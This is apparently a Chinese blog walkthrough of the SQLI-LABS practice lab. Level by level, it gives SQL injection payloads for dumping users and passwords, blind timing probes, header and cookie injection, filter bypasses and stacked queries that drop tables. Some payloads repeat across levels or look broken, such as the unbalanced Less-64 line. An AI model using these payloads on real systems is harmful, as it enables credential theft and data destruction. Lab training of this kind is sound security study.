惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

云风的 BLOG
云风的 BLOG
Help Net Security
Help Net Security
Y
Y Combinator Blog
WordPress大学
WordPress大学
D
DataBreaches.Net
N
Netflix TechBlog - Medium
U
Unit 42
爱范儿
爱范儿
MyScale Blog
MyScale Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
博客园 - 司徒正美
Google DeepMind News
Google DeepMind News
D
Docker
H
Help Net Security
Stack Overflow Blog
Stack Overflow Blog
宝玉的分享
宝玉的分享
博客园_首页
Microsoft Security Blog
Microsoft Security Blog
Engineering at Meta
Engineering at Meta
Know Your Adversary
Know Your Adversary
P
Privacy & Cybersecurity Law Blog
P
Proofpoint News Feed
T
Tenable Blog
S
Schneier on Security
V
Vulnerabilities – Threatpost
V
V2EX
T
Tor Project blog
Security Latest
Security Latest
S
Securelist
G
Google Developers Blog
NISL@THU
NISL@THU
Schneier on Security
Schneier on Security
Webroot Blog
Webroot Blog
小众软件
小众软件
Google Online Security Blog
Google Online Security Blog
阮一峰的网络日志
阮一峰的网络日志
W
WeLiveSecurity
IT之家
IT之家
I
InfoQ
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
月光博客
月光博客
I
Intezer
T
The Blog of Author Tim Ferriss
C
Cisco Blogs
博客园 - 【当耐特】
The GitHub Blog
The GitHub Blog
Cloudbric
Cloudbric
Scott Helme
Scott Helme
The Cloudflare Blog
L
LINUX DO - 热门话题

6Jyc5p+a

【笔记】通过NapCat和AstrBot实现QQ机器人 【笔记】部署NapCat 【笔记】部署AstrBot 【笔记】Poetry学习笔记 【笔记】uv学习笔记 【笔记】Nodejs通过mysql2操作MySQL数据库 【笔记】CodeBuddy学习笔记 【笔记】MiMoCode学习笔记 【笔记】OpenCode使用XiaomMiMo作为供应商 【笔记】OpenCode学习笔记 【笔记】IDEA的AiAssistant使用自定义的Agent 【笔记】MacOS上删除TimeMachine时间机器备份 【笔记】MacOS上部署XiaomiMiloco 【笔记】Docker的上下文 【源码】Python3创建1x1像素的图片 【靶场】xss-labs通关攻略 【靶场】upload-labs通关攻略 【笔记】Brave迁移ProxySwitchyOmega数据到ZeroOmega 【笔记】通过Docker部署DVWA 【笔记】通过Docker部署xss-labs 【笔记】通过Docker部署upload-labs 【笔记】通过Docker部署Vulhub 【笔记】宝塔通过Docker部署SQLI-LABS 【笔记】宝塔部署Docker 【笔记】通过Docker部署SQLI-LABS 【笔记】MSYS2学习笔记 【笔记】Cygwin学习笔记 【笔记】Windows添加自定义右键菜单项 【笔记】Linux上和MacOS上配置环境变量 【笔记】命令行配置HTTP代理 【笔记】Windows上配置环境变量 【踩坑】Windows上在IDEA中配置Codex报错 【笔记】start学习笔记 【笔记】Windows的CMD命令学习笔记 【笔记】Java的PriorityQueue和PriorityBlockingQueue 【笔记】IDEA通过AIAssistant安装Codex 【笔记】bcrypt学习笔记 【速查表】浏览器默认禁用的不安全端口 【笔记】Astro学习笔记 【代码】Python3实现从NTP服务器同步时间 【笔记】Koa学习笔记 【笔记】Solidity计算字符串的MD5值 【笔记】Hardhat学习笔记 【笔记】Go安装笔记 【笔记】CVE-2024-3094漏洞利用 【笔记】CVE-2026-43284和CVE-2026-43500漏洞利用 【笔记】CVE-2023-3567漏洞利用 【代码】Python3读写M1卡 【笔记】M1卡学习笔记 【笔记】Python3中文转拼音 【代码】Python3生成中国大陆姓名拼音 【代码】Python3爬取中国大陆手机号段 【笔记】Nodejs发送请求 【笔记】Trello通过API添加待办事项 【笔记】Nodejs的流和缓冲区 【笔记】Nodejs的事件 【笔记】Nodejs的文件和目录操作 【笔记】CNVD-2020-10487漏洞利用 【笔记】CVE-2017-12617漏洞利用 【笔记】PHP输出源码 【笔记】PHP的Phar 【笔记】通过Docker部署OnlineTools 【笔记】XML学习笔记 【笔记】Windows的用户和组 【笔记】CVE-2006-7243漏洞利用 【代码】JS将目录编号转换为十六进制 【笔记】PHP抑制所有报错 【笔记】HFish学习笔记 【笔记】JumpServer学习笔记 【笔记】Conpot学习笔记 【笔记】南墙WAF学习笔记 【笔记】堡塔云WAF学习笔记 【笔记】Windows的远程桌面服务 【笔记】Windows的防火墙
【靶场】SQLI-LABS通关攻略
57uv6Z6g · 2026-06-30 · via 6Jyc5p+a

前言

SQLI-LABS通关攻略

Page-1 (Basic Challenges)

Less-1

request
1
GET /Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+

Less-2

request
1
GET /Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users --+

Less-3

request
1
GET /Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+

Less-4

request
1
GET /Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+

Less-5

request
1
GET /Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+

Less-6

request
1
GET /Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+

Less-7

request
1
GET /Less-7/?id=1')) and ascii(substr((select database()),1,1))=115 --+

Less-8

request
1
GET /Less-8/?id=1' and ascii(substr((select database()),1,1))=115 --+

Less-9

request
1
GET /Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+

Less-10

request
1
GET /Less-10/?id=1" and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+

Less-11

request
1
2
3
4
POST /Less-11/
Content-Type: application/x-www-form-urlencoded

uname=' or 1=1 --+&passwd=1&submit=Submit

Less-12

request
1
2
3
4
POST /Less-12/
Content-Type: application/x-www-form-urlencoded

uname=-1") union select (select group_concat(username) from users),(select group_concat(password) from users) --+&passwd=1&submit=Submit

Less-13

request
1
2
3
4
POST /Less-13/
Content-Type: application/x-www-form-urlencoded

uname=admin') and sleep(3) --+&passwd=1&submit=Submit

Less-14

request
1
2
3
4
POST /Less-14/
Content-Type: application/x-www-form-urlencoded

uname=admin" and sleep(3) --+&passwd=1&submit=Submit

Less-15

request
1
2
3
4
POST /Less-15/
Content-Type: application/x-www-form-urlencoded

uname=admin' and if(length(database())=8,sleep(3),1) --+&passwd=1&submit=Submit

Less-16

request
1
2
3
4
POST /Less-16/
Content-Type: application/x-www-form-urlencoded

uname=admin") and if(length(database())=8,sleep(3),1) --+&passwd=1&submit=Submit

Less-17

request
1
2
3
4
POST /Less-17/
Content-Type: application/x-www-form-urlencoded

uname=admin&passwd=1' and updatexml(1,concat(0x7e,database()),1) --+&submit=Submit

Less-18

  • User-Agent 头注入
request
1
2
3
4
5
POST /Less18/
Content-Type: application/x-www-form-urlencoded
User-Agent: 1' or updatexml(1,concat(0x7e,database()),1) or '1

uname=admin&passwd=admin&submit=Submit

Less-19

request
1
2
3
4
5
POST /Less19/
Content-Type: application/x-www-form-urlencoded
Referer: 1' or updatexml(1,concat(0x7e,database()),1) or '1

uname=admin&passwd=admin&submit=Submit

Less-20

request
1
2
GET /Less-20/index.php
Cookie: uname=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+

Page-2 (Advanced Injections)

Less-21

request
1
2
GET /Less-21/index.php
Cookie: uname=LTEnKSB1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpIw%3d%3d

Less-22

request
1
2
GET /Less-22/index.php
Cookie: uname=LTEiIHVuaW9uIHNlbGVjdCAxLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSBmcm9tIHVzZXJzKSwoc2VsZWN0IGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSB1c2Vycykj

Less-23

request
1
GET /Less-23/?id=-1' union select 1,(select group_concat(username,0x3a,password) from users),3 or '1'='1

Less-24

  1. 注册admin'#用户
  2. 登录admin'#用户
  3. 修改admin'#用户密码
  4. 退出登录admin'#用户
  5. 登录admin用户,密码为admin'#用户的新密码


Less-25

  • 过滤 or/and 用 && ||
request
1
?id=-1' && 1=2 union select 1,2,3 and '1'='1

Less-25a

  • 过滤空格 or/and
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1

Less-26

  • 过滤空格、注释、or/and
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1

Less-26a

  • 过滤 /*#– 空格
request
1
?id=-1'%0aunion%0aselect%0a1,2,3%0aand%0a'1'='1

Less-27

  • 过滤 union select
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1

Less-27a

  • 过滤大小写关键字
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1

Less-28

  • 过滤 union select 注释
request
1
?id=-1' uNioN sElEcT 1,2,3 and '1'='1

Less-28a

  • 多层过滤关键字
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1

Less-29

  • 过滤空格,保留引号
request
1
?id=-1'%09union%09select%091,2,3%09and%09'1'='1

Less-30

  • 数字型过滤空格
request
1
?id=-1%09union%09select%091,2,3

Less-31

  • 双引号过滤空格
request
1
?id=-1"%09union%09select%091,2,3%09and%09"1"="1

Less-32

  • 宽字节 GBK %df 绕过 addslashes
request
1
?id=-1%df' union select 1,2,group_concat(username,0x3a,password) from users --+

Less-33

  • 宽字节 mysql_real_escape_string
request
1
?id=-1%df' union select 1,2,3 --+

Less-34

  • 宽字节 POST 注入
request
1
2
uname 参数:
%df' or 1=1 --+

Less-35

  • 数字型无转义宽字节无影响
request
1
?id=-1 union select 1,2,3 --+

Less-36

  • 单引号 mysql_real_escape_string 宽字节
request
1
?id=-1%df' union select 1,2,3 --+

Less-37

  • POST 宽字节注入
request
1
2
uname:
%df' union select 1,2 --+

Page-3 (Stacked Injections)

Less-38

  • 堆叠注入多语句
request
1
?id=1';select group_concat(username,0x3a,password) from users;--+

Less-39

  • 数字型堆叠注入
request
1
?id=1;select group_concat(username,0x3a,password) from users;--+

Less-40

  • ‘) 闭合堆叠注入
request
1
?id=1');select group_concat(username,0x3a,password) from users;--+

Less-41

  • 无过滤数字堆叠
request
1
?id=1;create table hack like users;--+

Less-42

  • “) 堆叠注入
request
1
?id=1");select database();--+

Less-43

  • ‘) 堆叠注入
request
1
?id=1');show tables;--+

Less-44

  • 双引号堆叠
request
1
?id=1");select user();--+

Less-45

  • ‘) 堆叠注入
request
1
?id=1');select group_concat(table_name) from information_schema.tables where table_schema=database();--+

Less-46

  • 数字堆叠无过滤
request
1
?id=1;drop table if exists test;create table test(id int);--+

Less-47

  • 单引号堆叠,过滤注释
request
1
?id=1';select database() and '1'='1

Less-48

  • 过滤# – 堆叠注入
request
1
?id=1';select database() and '1'='1

Less-49

  • 堆叠 + 空格过滤
request
1
?id=1';%09select%09database()%09and%09'1'='1

Less-50

  • 数字堆叠空格过滤
request
1
?id=1;%09select%09database()

Less-51

  • POST 堆叠注入
request
1
2
uname:
admin';select database();--+

Less-52

  • POST 数字堆叠
request
1
2
uname:
1;select group_concat(username,0x3a,password) from users;--+

Less-53

  • POST ‘) 堆叠
request
1
2
uname:
admin');select database();--+

Page-4 (Challenges)

Less-54

  • 随机闭合 + 过滤关键字盲注
request
1
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),1) and '1'='1

Less-55

  • 随机 ‘) 闭合过滤
request
1
?id=1') and if(ascii(substr(database(),1,1))=115,sleep(2),1) and ('1'='1

Less-56

  • 随机 “ 闭合过滤
request
1
?id=1" and if(ascii(substr(database(),1,1))=115,sleep(2),1) and "1"="1

Less-57

  • 随机数字型过滤
request
1
?id=1 and if(ascii(substr(database(),1,1))=115,sleep(2),1)

Less-58

  • 单引号无注释严格过滤
request
1
?id=-1' uNioN sElEcT 1,2,3 and '1'='1

Less-59

  • 双引号无注释过滤
request
1
?id=-1" uNioN sElEcT 1,2,3 and "1"="1

Less-60

  • 数字型无注释过滤
request
1
?id=-1 uNioN sElEcT 1,2,3

Less-61

  • POST 单引号随机过滤盲注
request
1
2
uname:
admin' and if(length(database())=8,sleep(2),1) and '1'='1

Less-62

  • POST ‘) 闭合盲注
request
1
2
uname:
admin') and if(length(database())=8,sleep(2),1) and ('1'='1

Less-63

  • POST “ 闭合盲注
request
1
2
uname:
admin" and if(length(database())=8,sleep(2),1) and "1"="1

Less-64

  • POST 数字盲注
request
1
2
uname:
1 and if(length(database())=8,sleep(2),1

Less-65

  • POST “) 闭合过滤盲注
request
1
2
uname:
admin") and if(length(database())=8,sleep(2),1) and ("1"="1

完成